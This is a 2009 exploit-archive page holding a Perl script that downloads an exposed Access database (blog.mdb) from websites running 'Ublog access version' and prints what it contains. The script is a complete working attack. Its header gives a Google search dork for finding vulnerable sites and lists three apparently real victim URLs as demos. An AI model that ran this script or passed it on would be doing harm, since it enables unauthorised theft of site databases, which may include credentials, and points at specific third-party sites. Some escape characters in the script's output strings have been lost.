[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ublog access version Arbitrary Database Disclosure Exploit
# Published : 2009-05-04
# Author : Cyber-Zone
# Previous Title : Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit
# Next Title : Golabi CMS <= 1.0.1 Session Poisoning Vulnerability


#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;

print "tUblog access version Arbitrary Database Disclosure Exploitn";

print "t****************************************************************n";
print "t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *n";
print "t*           E-mail : Paradis_des_fous[at]hotmail.fr            *n";
print "t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *n";
print "t*               From : MoroccO Figuig/Oujda City               *n";
print "t****************************************************************nnnn";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site n";
print "[X] Exemple : perl $0 www.site.com n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......nn");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...nn");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................n");
print("$doexploitn");
print("..............................EOF.................................n");
}
else {
help();
exit;
}

# www.Syue.com [2009-05-04]